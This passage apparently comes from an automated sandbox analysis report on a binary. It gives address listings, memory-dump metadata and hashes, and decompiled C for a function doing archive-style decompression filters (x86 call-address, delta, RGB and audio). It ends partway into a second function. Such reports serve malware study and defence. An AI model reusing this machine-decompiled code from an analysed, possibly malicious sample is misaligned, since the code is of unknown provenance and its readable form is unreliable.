                            0x009f6bdd
                            0x009f6bdf
                            0x009f6bfb
                            0x009f6bfe
                            0x009f6c05
                            0x009f6c08
                            0x009f6c0b
                            0x009f6c16
                            0x009f6c22
                            0x009f6c24
                            0x009f6c2a
                            0x009f6c2c
                            0x009f6c2c
                            0x009f6c2e
                            0x009f6c36
                            0x009f6c36
                            0x009f6c39
                            0x009f6c3c
                            0x009f6c4a
                            0x009f6c4d
                            0x009f6c55
                            0x009f6c58
                            0x009f6c5a
                            0x009f6c5e
                            0x009f6c65
                            0x009f6c6d
                            0x009f6c6f
                            0x009f6c76
                            0x009f6c78
                            0x009f6c78
                            0x009f6c7b
                            0x009f6c7b
                            0x009f6c3e
                            0x009f6c3e
                            0x009f6c3e
                            0x009f6c82
                            0x009f6c86
                            0x009f6c86
                            0x009f6c8a
                            0x009f6c8e
                            0x009f6c92
                            0x009f6723
                            0x009f6723
                            0x009f6725
                            0x009f6727
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6727
                            0x009f6723
                            0x009f6be7
                            0x009f6bea
                            0x009f6bea
                            0x009f6bec
                            0x00000000
                            0x00000000
                            0x009f6bee
                            0x009f6bef
                            0x009f6bf2
                            0x009f6bf5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6bf7
                            0x009f6bf9
                            0x00000000
                            0x009f6bf9
                            0x009f6bb2
                            0x009f6bb5
                            0x009f6bbf
                            0x009f6bc7
                            0x009f6bcc
                            0x009f6bcf
                            0x00000000
                            0x009f6bcf
                            0x009f6b79
                            0x009f6886
                            0x009f6886
                            0x009f688a
                            0x009f688e
                            0x00000000
                            0x009f688e
                            0x009f6b28
                            0x009f6b2a
                            0x009f6b34
                            0x009f6b3c
                            0x009f6b41
                            0x009f6b42
                            0x009f6b44
                            0x009f6b4d
                            0x009f6b54
                            0x009f6b5f
                            0x009f6b67
                            0x009f6b69
                            0x00000000
                            0x009f6b69
                            0x009f68b1
                            0x009f68b7
                            0x009f68ba
                            0x009f68c7
                            0x009f68ca
                            0x009f68d0
                            0x009f68d0
                            0x009f68bc
                            0x009f68bc
                            0x009f68bc
                            0x009f68d2
                            0x009f68d5
                            0x009f68d9
                            0x009f68db
                            0x009f68df
                            0x009f68e6
                            0x009f68f0
                            0x009f68f2
                            0x009f68fb
                            0x009f68fd
                            0x009f68fd
                            0x009f6900
                            0x009f6900
                            0x009f6905
                            0x009f690c
                            0x009f6912
                            0x009f6918
                            0x009f691f
                            0x009f694c
                            0x009f694d
                            0x009f694e
                            0x009f6950
                            0x009f696c
                            0x009f696f
                            0x009f6976
                            0x009f6979
                            0x009f697c
                            0x009f6987
                            0x009f6993
                            0x009f6995
                            0x009f699b
                            0x009f699d
                            0x009f699d
                            0x009f699f
                            0x00000000
                            0x009f699f
                            0x009f6958
                            0x009f695b
                            0x009f695b
                            0x009f695d
                            0x00000000
                            0x00000000
                            0x009f695f
                            0x009f6960
                            0x009f6963
                            0x009f6966
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6968
                            0x009f696a
                            0x00000000
                            0x009f6921
                            0x009f6923
                            0x009f6926
                            0x009f6930
                            0x009f6938
                            0x009f693d
                            0x009f6940
                            0x009f69a7
                            0x009f69a7
                            0x009f69aa
                            0x009f69ad
                            0x009f69bd
                            0x009f69c0
                            0x009f69c0
                            0x009f69af
                            0x009f69af
                            0x009f69af
                            0x009f69c2
                            0x009f69c3
                            0x009f69c7
                            0x009f69c9
                            0x009f69cb
                            0x009f6ad9
                            0x009f6ad9
                            0x009f6adf
                            0x009f6ae5
                            0x009f6ae6
                            0x009f6aea
                            0x009f6af0
                            0x009f6af2
                            0x009f6af3
                            0x009f6af7
                            0x009f6afd
                            0x009f6aff
                            0x009f6aff
                            0x009f6b00
                            0x009f6b00
                            0x009f6afd
                            0x009f6af0
                            0x009f6b04
                            0x009f6b0c
                            0x009f6b12
                            0x009f6b16
                            0x00000000
                            0x009f69d1
                            0x009f69d1
                            0x009f69d4
                            0x009f6ab5
                            0x009f6abe
                            0x009f6ac6
                            0x009f6aca
                            0x009f6ad1
                            0x009f6ad3
                            0x009f6ad3
                            0x009f6ad6
                            0x00000000
                            0x009f6ad6
                            0x009f69da
                            0x009f69de
                            0x009f69e7
                            0x009f69f5
                            0x009f69f9
                            0x009f6a00
                            0x009f6a02
                            0x009f6a02
                            0x009f6a05
                            0x009f6a05
                            0x009f6a0a
                            0x009f6a11
                            0x009f6a17
                            0x009f6a1d
                            0x009f6a24
                            0x009f6a51
                            0x009f6a52
                            0x009f6a53
                            0x009f6a55
                            0x009f6a71
                            0x009f6a74
                            0x009f6a7b
                            0x009f6a7e
                            0x009f6a81
                            0x009f6a8c
                            0x009f6a98
                            0x009f6a9a
                            0x009f6aa0
                            0x009f6aa2
                            0x009f6aa2
                            0x009f6aa4
                            0x00000000
                            0x009f6aa4
                            0x009f6a5d
                            0x009f6a60
                            0x009f6a60
                            0x009f6a62
                            0x00000000
                            0x00000000
                            0x009f6a64
                            0x009f6a65
                            0x009f6a68
                            0x009f6a6b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6a6d
                            0x009f6a6f
                            0x00000000
                            0x009f6a26
                            0x009f6a28
                            0x009f6a2b
                            0x009f6a35
                            0x009f6a3d
                            0x009f6a42
                            0x009f6a45
                            0x009f6aac
                            0x009f6aaf
                            0x00000000
                            0x009f6aaf
                            0x009f6a24
                            0x009f69cb
                            0x009f691f
                            0x009f6859
                            0x009f6860
                            0x009f6897
                            0x009f6897
                            0x009f689c
                            0x009f689f
                            0x00000000
                            0x009f689f
                            0x009f6862
                            0x009f6866
                            0x00000000
                            0x00000000
                            0x009f6868
                            0x009f686e
                            0x009f686f
                            0x009f6872
                            0x00000000
                            0x00000000
                            0x009f6874
                            0x009f6875
                            0x009f687c
                            0x009f6880
                            0x009f6880
                            0x009f6880
                            0x00000000
                            0x009f6880
                            0x009f67d0
                            0x009f6723
                            0x009f66ec
                            0x00000000
                            0x009f66b7
                            0x009f66ba
                            0x009f66be
                            0x009f66c2
                            0x009f66c6
                            0x009f66c7
                            0x009f66ce
                            0x00000000
                            0x009f66d0
                            0x009f66d0
                            0x00000000
                            0x009f66d0
                            0x009f66ce

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0793d6b854b1a05e813c8b22389def9d3c27e0c2eeb073e8ea88ae2f1cf816d0
                            • Instruction ID: 521f943df848096f76dbbc11d97ace0bc1364f5bc778edd9a2c3933d5256e08b
                            • Opcode Fuzzy Hash: 0793d6b854b1a05e813c8b22389def9d3c27e0c2eeb073e8ea88ae2f1cf816d0
                            • Instruction Fuzzy Hash: CC12D4B160470A8BC729DF28C9D0779B7E0FF55308F14892EE697C7A81D378A895CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EBAD1, Relevance: .4, Instructions: 449COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009EBAD1(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				signed int _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed int _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed char _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed char _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed char _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *(_t355 + 0x60) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *(_t355 + 0x60);
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x28) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x30) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0xa1d070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x28);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *((intOrPtr*)(_t355 + 0x64)) = 0;
						 *(_t355 + 0x38) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E009EC03A(_t277, _t175, 4) == 5) {
									E009EC085(_t277, E009EC03A(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x34);
								_t285 =  *(_t355 + 0x60);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x60) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x30);
						_t316 =  *(_t355 + 0x28);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x28) = _t316;
						 *(_t355 + 0x30) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x60) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x28) = _t289;
					 *(_t355 + 0x34) = _t278;
					 *(_t355 + 0x3c) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x24) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x14) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x1c) = 0;
						 *(_t355 + 0x10) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x60);
							_t221 =  *(_t355 + 0x34) - _t351;
							_t352 =  *(_t355 + 0x34);
							 *(_t355 + 0x20) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x3c) = E00A04E62(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x24) = E00A04E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t234 = E00A04E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t292 =  *((intOrPtr*)(_t355 + 0x44));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x18);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
										_t279 =  *(_t355 + 0x30);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x2c);
										}
									} else {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
									}
								}
								_t223 =  *(_t355 + 0x24);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x24) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x20);
							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
							_t351 =  *(_t355 + 0x14);
							_t218 =  *(_t355 + 0x1c);
							_t319 =  *(_t355 + 0x10);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x1c) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x3c);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x2c) = _t293;
					 *(_t355 + 0x30) = _t235;
					 *(_t355 + 0x38) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x34) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
							 *(_t355 + 0x1c) = 0;
							E009FE920(_t336, _t355 + 0x40, 0, 0x1c);
							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x24) = _t336;
							if(_t336 <  *(_t355 + 0x30)) {
								_t238 =  *(_t355 + 0x60);
								do {
									_t322 =  *(_t355 + 0x1c);
									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
									_t297 =  *(_t355 + 0x2c);
									 *(_t355 + 0x18) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x2c) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
									 *(_t355 + 0x24) = _t304;
									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E00A04E62(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00A04E62(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00A04E62(_t323,  *(_t355 + 0x20) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00A04E62(_t323, (_t323 << 3) -  *(_t355 + 0x20));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00A04E62(_t323,  *(_t355 + 0x24) + _t349);
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00A04E62(_t323, _t349 -  *(_t355 + 0x14));
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00A04E62(_t323, _t349 +  *(_t355 + 0x14));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x10);
										_t238 =  *(_t355 + 0x60);
									} else {
										_t324 =  *(_t355 + 0x40);
										_t266 = 0;
										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x40 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x10);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x10) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x60) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x60);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x24) + _t281;
									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
									 *(_t355 + 0x24) = _t306;
								} while (_t306 <  *(_t355 + 0x30));
								_t336 =  *(_t355 + 0x34);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x34) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x28) = _t309;
				 *(_t355 + 0x60) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x24) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x60)) {
							_t310 =  *(_t355 + 0x60);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x28);
								_t274 =  *(_t355 + 0x24);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x28) = _t309;
						 *(_t355 + 0x24) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}









































































                            0x009ebad1
                            0x009ebadb
                            0x009ebae0
                            0x009ebb77
                            0x00000000
                            0x009ebb77
                            0x009ebae9
                            0x009ebfc1
                            0x009ebfc4
                            0x009ebfc6
                            0x009ebfc9
                            0x009ebfd2
                            0x009ec033
                            0x00000000
                            0x009ec033
                            0x009ebfda
                            0x009ebfdc
                            0x009ebfde
                            0x009ebfe4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ebfea
                            0x009ebfea
                            0x009ebfea
                            0x009ebfec
                            0x009ebfed
                            0x009ebfee
                            0x009ebff2
                            0x009ebff8
                            0x009ebffc
                            0x009ec00f
                            0x009ec017
                            0x009ec01b
                            0x009ec01b
                            0x009ebffe
                            0x009ec003
                            0x009ec005
                            0x009ec00b
                            0x009ec00b
                            0x009ec003
                            0x009ec01d
                            0x009ec021
                            0x009ec024
                            0x009ec027
                            0x009ec027
                            0x009ec02a
                            0x00000000
                            0x009ec02e
                            0x009ebaf2
                            0x009ebefb
                            0x009ebefd
                            0x009ebf06
                            0x00000000
                            0x00000000
                            0x009ebf0f
                            0x009ebf12
                            0x009ebf18
                            0x00000000
                            0x00000000
                            0x009ebf22
                            0x009ebf23
                            0x009ebf27
                            0x009ebf2d
                            0x009ebf30
                            0x00000000
                            0x00000000
                            0x009ebf32
                            0x009ebf3a
                            0x00000000
                            0x00000000
                            0x009ebf3c
                            0x009ebf40
                            0x009ebf42
                            0x009ebf47
                            0x009ebf4b
                            0x009ebf4f
                            0x009ebf50
                            0x009ebf57
                            0x009ebf5b
                            0x009ebf6a
                            0x009ebf85
                            0x009ebf85
                            0x009ebf8a
                            0x009ebf8e
                            0x009ebf8e
                            0x009ebf92
                            0x009ebf93
                            0x009ebf96
                            0x009ebf9a
                            0x009ebf9f
                            0x009ebfa3
                            0x009ebfa7
                            0x009ebfa7
                            0x009ebfaa
                            0x009ebfab
                            0x009ebfae
                            0x009ebfb2
                            0x009ebfb2
                            0x00000000
                            0x009ebfbc
                            0x009ebafb
                            0x009ebdaf
                            0x009ebdb2
                            0x009ebdb5
                            0x009ebdb8
                            0x009ebdbc
                            0x009ebdbf
                            0x009ebdc6
                            0x009ebdca
                            0x009ebdd3
                            0x00000000
                            0x009ebdea
                            0x009ebdea
                            0x009ebdec
                            0x009ebdf0
                            0x009ebdf3
                            0x009ebdf7
                            0x009ebdfb
                            0x009ebdfd
                            0x009ebe01
                            0x009ebe05
                            0x009ebe05
                            0x009ebe09
                            0x00000000
                            0x00000000
                            0x009ebe0f
                            0x009ebe16
                            0x009ebe1a
                            0x009ebe1c
                            0x009ebe20
                            0x009ebe24
                            0x009ebe28
                            0x009ebe2a
                            0x009ebe2d
                            0x009ebe35
                            0x009ebe3b
                            0x009ebe49
                            0x009ebe5e
                            0x009ebe62
                            0x009ebe67
                            0x009ebe6b
                            0x009ebe6e
                            0x009ebe74
                            0x009ebe84
                            0x009ebe8a
                            0x009ebe8e
                            0x009ebe92
                            0x009ebe94
                            0x009ebe94
                            0x009ebe7a
                            0x009ebe7a
                            0x009ebe7e
                            0x009ebe7e
                            0x009ebe74
                            0x009ebe98
                            0x009ebe9f
                            0x009ebea2
                            0x009ebeaa
                            0x009ebead
                            0x009ebeb4
                            0x009ebeb4
                            0x009ebebe
                            0x009ebec2
                            0x009ebec6
                            0x009ebeca
                            0x009ebeca
                            0x009ebecb
                            0x009ebecf
                            0x009ebed8
                            0x009ebedc
                            0x009ebeef
                            0x009ebee1
                            0x009ebee5
                            0x009ebee8
                            0x009ebeec
                            0x009ebeec
                            0x00000000
                            0x009ebef3
                            0x009ebdd3
                            0x009ebb04
                            0x009ebb83
                            0x009ebb86
                            0x009ebb88
                            0x009ebb8b
                            0x009ebb91
                            0x009ebb95
                            0x009ebb9e
                            0x00000000
                            0x009ebbb8
                            0x009ebbb8
                            0x009ebbba
                            0x009ebbc0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ebbc2
                            0x009ebbc2
                            0x009ebbc2
                            0x009ebbcb
                            0x009ebbd0
                            0x009ebbd2
                            0x009ebbd7
                            0x009ebbd9
                            0x009ebbde
                            0x009ebbe6
                            0x009ebbea
                            0x009ebbef
                            0x009ebbf3
                            0x009ebbf6
                            0x009ebbfe
                            0x009ebc04
                            0x009ebc08
                            0x009ebc08
                            0x009ebc16
                            0x009ebc1a
                            0x009ebc23
                            0x009ebc27
                            0x009ebc2b
                            0x009ebc54
                            0x009ebc56
                            0x009ebc65
                            0x009ebc69
                            0x009ebc6d
                            0x009ebc76
                            0x009ebc86
                            0x009ebc96
                            0x009ebca6
                            0x009ebcb6
                            0x009ebcc4
                            0x009ebcd1
                            0x009ebcd5
                            0x009ebcdd
                            0x009ebd79
                            0x009ebd7d
                            0x009ebce3
                            0x009ebce3
                            0x009ebce7
                            0x009ebce9
                            0x009ebcef
                            0x009ebcf0
                            0x009ebcf4
                            0x009ebcf6
                            0x009ebcfa
                            0x009ebcfa
                            0x009ebcfc
                            0x009ebd01
                            0x009ebd02
                            0x009ebd07
                            0x009ebd0b
                            0x009ebd0e
                            0x009ebd6d
                            0x009ebd74
                            0x009ebd76
                            0x009ebd76
                            0x00000000
                            0x009ebd74
                            0x009ebd10
                            0x009ebd13
                            0x009ebd61
                            0x009ebd68
                            0x009ebd6a
                            0x009ebd6a
                            0x00000000
                            0x009ebd68
                            0x009ebd15
                            0x009ebd18
                            0x009ebd51
                            0x009ebd58
                            0x00000000
                            0x00000000
                            0x009ebd5a
                            0x009ebd5b
                            0x009ebd5b
                            0x00000000
                            0x009ebd5b
                            0x009ebd1a
                            0x009ebd1d
                            0x009ebd45
                            0x009ebd4c
                            0x00000000
                            0x00000000
                            0x009ebd4e
                            0x00000000
                            0x009ebd4e
                            0x009ebd1f
                            0x009ebd22
                            0x009ebd39
                            0x009ebd40
                            0x00000000
                            0x00000000
                            0x009ebd42
                            0x009ebd33
                            0x009ebd33
                            0x00000000
                            0x009ebd33
                            0x009ebd27
                            0x009ebd2b
                            0x00000000
                            0x009ebd32
                            0x009ebd32
                            0x00000000
                            0x009ebd32
                            0x009ebd2b
                            0x009ebd81
                            0x009ebd85
                            0x009ebd87
                            0x009ebd8b
                            0x009ebd8f
                            0x009ebd99
                            0x009ebd99
                            0x009ebd9d
                            0x009ebd9e
                            0x009ebda2
                            0x00000000
                            0x009ebdaa
                            0x009ebb9e
                            0x009ebb09
                            0x00000000
                            0x00000000
                            0x009ebb0b
                            0x009ebb0e
                            0x009ebb10
                            0x009ebb13
                            0x009ebb1a
                            0x009ebb24
                            0x00000000
                            0x009ebb3e
                            0x009ebb3e
                            0x009ebb40
                            0x009ebb44
                            0x009ebb44
                            0x009ebb46
                            0x009ebb4c
                            0x009ebb4e
                            0x009ebb4e
                            0x009ebb52
                            0x009ebb52
                            0x009ebb54
                            0x009ebb57
                            0x009ebb58
                            0x009ebb5b
                            0x009ebb5f
                            0x00000000
                            0x009ebb61
                            0x009ebb61
                            0x009ebb65
                            0x00000000
                            0x009ebb65
                            0x009ebb5f
                            0x009ebb69
                            0x009ebb69
                            0x009ebb6a
                            0x009ebb6d
                            0x009ebb71
                            0x009ebb71
                            0x00000000
                            0x009ebb44

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 99ce89df691080be3c593410f859a7e39f57e5e159846c1454f55bd5175059fb
                            • Instruction ID: caf615c763a219fa7ecc25cb9dfbf80e63e2a9f6e0eaf47c30abff4293080b00
                            • Opcode Fuzzy Hash: 99ce89df691080be3c593410f859a7e39f57e5e159846c1454f55bd5175059fb
                            • Instruction Fuzzy Hash: 4FF198B1A083858FC716CE2AC48066BBBE6FBC9344F144A2EF5C597355D734ED468B42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A00113, Relevance: .3, Instructions: 345COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A00113(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
